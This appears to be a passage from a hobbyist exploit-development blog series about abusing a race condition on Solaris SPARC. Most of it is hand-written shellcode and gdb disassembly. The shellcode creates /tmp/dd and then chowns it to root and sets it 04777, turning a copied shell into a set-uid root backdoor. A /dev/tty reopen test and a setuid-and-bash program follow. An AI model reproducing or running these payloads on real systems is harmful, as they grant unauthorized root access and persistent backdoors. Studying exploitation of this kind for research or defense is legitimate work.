Race Condition SHMACE ShmUh’SMISION – pt. 16

WELL WELL WELL. I’m getting the shell.. but what’s this!?! As user .. “DAEMON!??!” UID of 1 ???

I thought to myself WTF.. So I tried touching a file.. this is the code I’m using to do that:

!-----------------------------------------------------------------------
! Test payload: open("/tmp/dd", 0x100, <mode left in %o2>) ; exit(0)
! Syntax: SPARC, GNU as (Solaris).  System calls are "ta 8" with the
!         call number in %g1 and arguments in %o0..%o2 (the same shape as
!         the libc stubs disassembled further down the page).
! Purpose: find out which uid the injected code actually runs as -- the
!          "ls -l /tmp" after this listing shows the created file is
!          owned by root.
! Encoding: presumably has to be free of 0x00 bytes, which is why the
!          immediates below are built with sethi / sll / xor instead of
!          the direct forms (see the commented-out alternatives).
!-----------------------------------------------------------------------
.globl main
main:
! # /bin/bash = 2f62696e 2f626173 6800
! # /tmp/dd = 2f746d70 2f646500
! Build "/tmp/dd\0" on the stack at %sp+84 as two big-endian 32-bit words.
set 0x2f746d70, %o0                   ! "/tmp"
st %o0, [%sp+84]
! sethi keeps only the upper 22 bits of its immediate, so the word stored
! is 0x2f646400 = "/dd\0": the terminating NUL comes from the dropped low
! bits, not from a 0x00 byte in the instruction encoding.
sethi %hi(0x2f646500), %o0
st %o0, [%sp+88]
!mov 0x100, %o1
! %o1 = 0x100 (O_CREAT on Solaris), built as 1 << 8 -- presumably because
! the direct "mov 0x100, %o1" form would encode a 0x00 byte.
mov 0x1, %o1
sll %o1, 8, %o1
!or %o1, %o0, %o0
add %sp, 84, %o0                      ! %o0 = pointer to "/tmp/dd"
! %o2 (the mode argument) is not set here; the ls output shows mode 0000.
mov  5, %g1     ! 0x5                 ! syscall 5 = open (cf. <__open+0>)
ta 8
!ta 8
! addition to prevent illegal instruction failure
! (also zeroes %o0, the exit status, without the 0x00 bytes a "clr %o0"
! would carry in its encoding)
xor %o5,%o5,%o0
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
mov     1, %g1                        ! syscall 1 = exit
ta      8
$ ls -l /tmp
----------   1 root     staff          0 Nov  5 21:02 dd

So I definitely have root privilege when my shellcode is executed.. So what’s the deal?? Why can’t I start a shell properly???

I have decided to copy a shell into the file /tmp/dd, which I will then have my shellcode turn into a suid root shell :)

#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/*
 * Reference program, compiled only so that its disassembly (below) gives
 * the syscall numbers and argument setup for the hand-written shellcode:
 * chown("/tmp/dd", 0, 0) followed by chmod("/tmp/dd", 04777), i.e. make
 * the file root-owned and set-uid.  chown to uid 0 normally requires
 * privilege, so both calls only succeed with an effective uid of 0; the
 * return values are deliberately not checked here.
 */
main()
{
  char str[] = "/tmp/dd";

  // int chown(const char *path, uid_t owner, gid_t group)
  chown (str, 0, 0);
  // int chmod(const char *path, mode_t mode);
  chmod (str, 04777);
}
0x00010234 <main+0>:    save  %sp, -112, %sp
0x00010238 <main+4>:    sethi  %hi(0x17800), %g1
0x0001023c <main+8>:    or  %g1, 0x138, %o0     ! 0x17938
0x00010240 <main+12>:   clr  %o1
0x00010244 <main+16>:   clr  %o2
0x00010248 <main+20>:   call  0x10838 <chown>
0x0001024c <main+24>:   nop
0x00010250 <main+28>:   sethi  %hi(0x17800), %g1
0x00010254 <main+32>:   or  %g1, 0x138, %o0     ! 0x17938
0x00010258 <main+36>:   mov  0x9ff, %o1
0x0001025c <main+40>:   call  0x10814 <chmod>
0x00010260 <main+44>:   nop
0x00010264 <main+48>:   restore
0x00010268 <main+52>:   retl
0x0001026c <main+56>:   nop
End of assembler dump.
(gdb) disas chown
Dump of assembler code for function chown:
0x00010838 <chown+0>:   mov  0x10, %g1
0x0001083c <chown+4>:   ta  8
0x00010840 <chown+8>:   bcc  0x10854 <chown+28>
0x00010844 <chown+12>:  sethi  %hi(0x17000), %o5
0x00010848 <chown+16>:  or  %o5, 0x3c, %o5      ! 0x1703c <_cerror>
0x0001084c <chown+20>:  jmp  %o5
0x00010850 <chown+24>:  nop
0x00010854 <chown+28>:  retl
0x00010858 <chown+32>:  mov  %g0, %o0
End of assembler dump.
(gdb) disas chmod
Dump of assembler code for function chmod:
0x00010814 <chmod+0>:   mov  0xf, %g1   ! 0xf
0x00010818 <chmod+4>:   ta  8
0x0001081c <chmod+8>:   bcc  0x10830 <chmod+28>
0x00010820 <chmod+12>:  sethi  %hi(0x17000), %o5
0x00010824 <chmod+16>:  or  %o5, 0x3c, %o5      ! 0x1703c <_cerror>
0x00010828 <chmod+20>:  jmp  %o5
0x0001082c <chmod+24>:  nop
0x00010830 <chmod+28>:  retl
0x00010834 <chmod+32>:  mov  %g0, %o0
End of assembler dump.
(gdb)

chown/chmod /tmp/dd ASM for shellcode

!-----------------------------------------------------------------------
! Payload: chown("/tmp/dd", 0, 0); chmod("/tmp/dd", 04777); exit(0)
! Hand-assembled from the chown/chmod libc stubs disassembled above:
! syscall 0x10 = chown, 0xf = chmod, 1 = exit; number in %g1, args in
! %o0..%o2, trap with "ta 8".
! Effect: makes /tmp/dd root-owned and set-uid.  This only succeeds when
! the injected code runs with an effective uid of 0.
! Encoding: presumably has to be free of 0x00 bytes, hence the sethi /
! xor / add-%g0 forms instead of the direct mov/clr equivalents.
!-----------------------------------------------------------------------
.globl main
main:
! # /tmp/dd = 2f746d70 2f646500
! "/tmp/dd\0" at %sp+84: "/tmp", then "/dd\0" (sethi drops the low 10
! bits of 0x2f646500, so the stored word is 0x2f646400), then a zero word.
set 0x2f746d70, %o0
st %o0, [%sp+84]
sethi %hi(0x2f646500), %o0
st %o0, [%sp+88]
clr [%sp+92]                          ! st %g0: extra terminating word


!put pointer to string into $o0
add %sp,84,%o0
xor %l1, %l1, %o1                     ! owner uid = 0
xor %l1, %l1, %o2                     ! group gid = 0
 !call  0x10838 <chown>
 ! for function chown:
 mov  0x10, %g1                       ! syscall 0x10 = chown (see <chown+0>)
 ta  8
 ! NOTE: the libc stub branches to _cerror on carry set after "ta 8";
 ! that check is not replicated, so a failed chown falls through to chmod.
 
!put pointer to string into $o0
add %sp,84,%o0
 mov  0x9ff, %o1                      ! 0x9ff = 04777: set-uid + rwx for all
! call  0x10814 <chmod>
! nop
mov  0xf, %g1   ! 0xf                 ! syscall 0xf = chmod (see <chmod+0>)
ta  8

! addition to prevent illegal instruction failure
xor %o5,%o5,%o0                       ! %o0 = 0 = exit status
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
!mov    1, %g1
add %g0, 1, %g1                       ! %g1 = 1 = exit
ta      8
-bash-3.2$ vi opentty.c
"opentty.c" 6 lines, 64 characters

#include <fcntl.h>
/*
 * Test program: replace stdin (fd 0) with the controlling terminal, then
 * block in getchar() so the state can be inspected under gdb (the session
 * below breaks just before the call to open and prints the %o0 path).
 * open() should hand back fd 0 because it was just closed and is the
 * lowest free descriptor; neither return value is checked.  Only
 * <fcntl.h> is included, so close() and getchar() are called through
 * implicit declarations (accepted by the old Solaris gcc used here).
 */
main()
{
  close(0);
  open("/dev/tty", O_RDWR);
  getchar();
}
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
"opentty.c" 8 lines, 84 characters
-bash-3.2$ gcc opentty.c
-bash-3.2$ ./a.out
l
-bash-3.2$ gcc -static opentty.c
-bash-3.2$ gdb a.out
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) disas main
Dump of assembler code for function main:
0x00010238 <main+0>:    save  %sp, -112, %sp
0x0001023c <main+4>:    clr  %o0
0x00010240 <main+8>:    call  0x1234c <close>
0x00010244 <main+12>:   nop
0x00010248 <main+16>:   sethi  %hi(0x39000), %g1
0x0001024c <main+20>:   or  %g1, 0x3a8, %o0     ! 0x393a8
0x00010250 <main+24>:   mov  2, %o1
0x00010254 <main+28>:   call  0x123b0 <open>
0x00010258 <main+32>:   nop
0x0001025c <main+36>:   call  0x10814 <getchar>
0x00010260 <main+40>:   nop
0x00010264 <main+44>:   restore
0x00010268 <main+48>:   retl
0x0001026c <main+52>:   nop
End of assembler dump.
(gdb) disas close
Dump of assembler code for function close:
0x0001234c <close+0>:   sethi  %hi(0x52400), %g1
0x00012350 <close+4>:   add  %g1, 0x180, %g1    ! 0x52580 <ti_jmp_table+236>
0x00012354 <close+8>:   ld  [ %g1 ], %g1
0x00012358 <close+12>:  jmp  %g1
0x0001235c <close+16>:  nop
End of assembler dump.
(gdb) disas _close
Dump of assembler code for function _private_close:
0x0001776c <_private_close+0>:  mov  6, %g1
0x00017770 <_private_close+4>:  ta  8
0x00017774 <_private_close+8>:  bcc  0x17788 <_private_close+28>
0x00017778 <_private_close+12>: sethi  %hi(0x18800), %o5
0x0001777c <_private_close+16>: or  %o5, 0x360, %o5     ! 0x18b60 <_cerror>
0x00017780 <_private_close+20>: jmp  %o5
0x00017784 <_private_close+24>: nop
0x00017788 <_private_close+28>: retl
0x0001778c <_private_close+32>: mov  %g0, %o0
End of assembler dump.
(gdb) b main
Breakpoint 1 at 0x1023c
(gdb) r
Starting program: /tmp/a.out

Breakpoint 1, 0x0001023c in main ()
(gdb) si
0x00010240 in main ()
(gdb)
0x00010244 in main ()
(gdb)
0x0001234c in close ()
(gdb)
0x00012350 in close ()
(gdb)
0x00012354 in close ()
(gdb)
0x00012358 in close ()
(gdb)
0x0001235c in close ()
(gdb)
0x0001776c in _private_close ()
(gdb) disas open
Dump of assembler code for function open:
0x000123b0 <open+0>:    sethi  %hi(0x52400), %g1
0x000123b4 <open+4>:    add  %g1, 0x194, %g1    ! 0x52594 <ti_jmp_table+256>
0x000123b8 <open+8>:    ld  [ %g1 ], %g1
0x000123bc <open+12>:   jmp  %g1
0x000123c0 <open+16>:   nop
End of assembler dump.
(gdb) disas _open
Dump of assembler code for function _open:
0x000151a8 <_open+0>:   save  %sp, -96, %sp
0x000151ac <_open+4>:   mov  %i0, %o0
0x000151b0 <_open+8>:   mov  %i1, %o1
0x000151b4 <_open+12>:  call  0x1790c <__open>
0x000151b8 <_open+16>:  mov  %i2, %o2
0x000151bc <_open+20>:  sethi  %hi(0x52800), %o1
0x000151c0 <_open+24>:  ld  [ %o1 + 0x1d8 ], %o1        ! 0x529d8 <__xpg4>
0x000151c4 <_open+28>:  cmp  %o1, 1
0x000151c8 <_open+32>:  bne  0x151f8 <_open+80>
0x000151cc <_open+36>:  mov  %o0, %i0
0x000151d0 <_open+40>:  cmp  %o0, -1
0x000151d4 <_open+44>:  be  0x151f8 <_open+80>
0x000151d8 <_open+48>:  nop
0x000151dc <_open+52>:  call  0x15258 <isptsfd>
0x000151e0 <_open+56>:  nop
0x000151e4 <_open+60>:  tst  %o0
0x000151e8 <_open+64>:  be  0x151f8 <_open+80>
0x000151ec <_open+68>:  nop
0x000151f0 <_open+72>:  call  0x153b4 <push_module>
0x000151f4 <_open+76>:  mov  %i0, %o0
0x000151f8 <_open+80>:  ret
0x000151fc <_open+84>:  restore
End of assembler dump.
(gdb) disas __open
Dump of assembler code for function __open:
0x0001790c <__open+0>:  mov  5, %g1     ! 0x5
0x00017910 <__open+4>:  ta  8
0x00017914 <__open+8>:  bcc  0x17928 <__open+28>
0x00017918 <__open+12>: sethi  %hi(0x18800), %o5
0x0001791c <__open+16>: or  %o5, 0x360, %o5     ! 0x18b60 <_cerror>
0x00017920 <__open+20>: jmp  %o5
0x00017924 <__open+24>: nop
0x00017928 <__open+28>: retl
0x0001792c <__open+32>: nop
End of assembler dump.
(gdb) b *0x00010254
Breakpoint 2 at 0x10254
(gdb) c
Continuing.

Breakpoint 2, 0x00010254 in main ()
(gdb) x/s $o0
0x393a8:         "/dev/tty"
(gdb)
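/*
 * Calls setuid(7343) and then runs an interactive /bin/bash via system().
 *
 * setuid(2) can fail (for example when the caller lacks the privilege to
 * change to that uid); the original ignored the return value and launched
 * the shell regardless, so on failure the shell would run with whatever
 * credentials the process already had.  The shell is now only started
 * when the uid change actually succeeded.
 *
 * Returns 0 after the shell exits (its own status is not propagated),
 * 1 if setuid() failed (errno is left set by the call).
 */
int main(void)
{
  if (setuid(7343) != 0)
    return 1;
  system("/bin/bash");
  return 0;
}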
